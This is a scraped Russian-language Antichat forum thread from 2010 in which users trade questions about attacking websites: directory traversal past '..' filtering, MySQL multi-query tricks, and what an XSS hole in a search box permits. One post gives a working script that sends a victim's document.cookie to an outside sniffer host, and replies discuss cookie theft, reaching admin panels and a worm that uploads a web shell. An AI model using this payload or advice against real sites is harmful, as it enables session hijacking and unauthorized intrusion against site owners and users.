Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
04.01.2010, 23:37
|
|
Новичок
Регистрация: 27.02.2007
Сообщений: 8
Провел на форуме:
29882
Репутация:
0
|
|
Сообщение от Strilo4ka
а mysqli розширение не??? я не увверен но просто когда то что то читал в книге кажеться библия пользователя пхп мускуль ...
Ну вообще есть такие запросы, но при непосредственной работе с базой.
Насколько я знаю из php такое нельзя выполнить.
|
|
|
05.01.2010, 00:10
|
|
Новичок
Регистрация: 27.02.2007
Сообщений: 8
Провел на форуме:
29882
Репутация:
0
|
|
Сообщение от Strilo4ka
почитай о mysqli тут тока его редко используют а используют тогда если много запросов тупят роботу, то переписуют одним используя multi_query. Да, действительно. Но нам это к сожалению врядли поможет 
|
|
|
|
05.01.2010, 00:13
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Как поднятся на уровень директории выше, если скрипт обрезает ".."?
|
|
|
|
05.01.2010, 00:18
|
|
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206
Репутация:
1861
|
|
Сообщение от mailbrush
Как поднятся на уровень директории выше, если скрипт обрезает ".."?
сомневаюсь в возможности
|
|
|
|
05.01.2010, 00:38
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440
Репутация:
648
|
|
Сообщение от mailbrush
Как поднятся на уровень директории выше, если скрипт обрезает ".."?
Обрезается только ".." или "." тоже?
|
|
|
|
05.01.2010, 02:52
|
|
Новичок
Регистрация: 21.01.2009
Сообщений: 6
Провел на форуме:
62064
Репутация:
0
|
|
Ку алл. Такой вопрос. Есть сайт с хсс, в поле поиска выполняется
<script > alert("XSS") < /script>
Немного помудрив смог выполнить на нем хтмл код
<img src=http://a3.bing.com/reference/assets/orig/128px/Noscriptlogo.png>
т.е. прописав этот код в поиске - на странице отобразилась картинка. я так понимаю, что могу выполнить и любой другой хтмл код
Собственно вопрос: смогу ли я, используя хтмл, залить шел или же только кража куков?
и вообще какие варианты, используя, то что я сейчас знаю пробиться к админке или бд?
Последний раз редактировалось Raul Duke; 05.01.2010 в 02:54..
|
|
|
|
05.01.2010, 02:55
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
Сообщение от Raul Duke
Ку алл. Такой вопрос. Есть сайт с хсс, в поле поиска выполняется
Немного помудрив смог выполнить на нем хтмл код
т.е. прописав этот код в поиске - на странице отобразилась картинка. я так понимаю, что могу выполнить и любой другой хтмл код
Собственно вопрос: смогу ли я, используя хтмл, залить шел или же только кража куков?
и вообще какие варианты, используя, то что я сейчас знаю пробиться к админке или бд.
Если зальешь шелл через XSS - выложи видео, лол ок.
*не надо мне тут говорить пров аши особые условия 
Только куки
*скажу сам про особые условия - если через админку льется шелл, то можно написать червячка, который от лица админа сам зальет шелл. Но это много ипоты.
|
|
|
|
05.01.2010, 03:01
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от Strilo4ka
Не только куки еще код скриптов можно смотреть, кузя писал!!!
дай ссылку плиз на это чудо
|
|
|
|
05.01.2010, 06:10
|
|
Познающий
Регистрация: 21.12.2009
Сообщений: 34
Провел на форуме:
124940
Репутация:
1
|
|
<script>
img = new Image(); img.src = "http://httpz.ru/nphir8lxm1y.gif?"+document.cookie;
</script>
вот код. Почему картинку не показывает и в логе сниффера не появляется запись? Подскажите плиз
|
|
|
|
05.01.2010, 06:25
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
С ним все нормально, иши ошибки в самой ксс. Малоли что оно там фильтрует =\
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
